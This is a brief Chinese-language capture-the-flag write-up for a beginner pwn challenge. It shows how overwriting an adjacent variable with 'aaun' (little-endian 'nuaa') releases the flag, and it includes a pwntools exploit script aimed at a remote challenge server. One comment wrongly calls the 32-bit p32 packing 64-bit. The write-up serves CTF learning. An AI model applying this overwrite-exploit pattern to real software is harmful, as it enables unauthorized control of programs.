用kali linux 打开
习惯性的用ls没有什么用,然后查看是多少位
然后用64位IDA打开查看程序
发现当unk_601068等于nuaa时才能得到flag
unk-601068和dword——60106C相差4 个字节,然后我们可以通过覆盖来改变dwod_60106c的赋值。
这种可以有俩种方法:
第一种:通过先输入四给任意字符再输入"aaun" (为什么是aaun呢,因为小端序和大端序的问题,小端序低地址存低位,大端序就是低地址存高位,这里采用小端序)
得到flag
第二种:就直接写exp
from pwn import *
p=remote('61.147.171.105','62650')#连接远程靶机
p.recv()
payload=b'a'*4+p32(1853186401)#用4字节填充,再将1853186401打包成64位覆盖dword_60106C位置
p.sendline(payload)#将payload发送给程序
p.interactive()进入交互界面成功拿到flag
然后执行
得到flag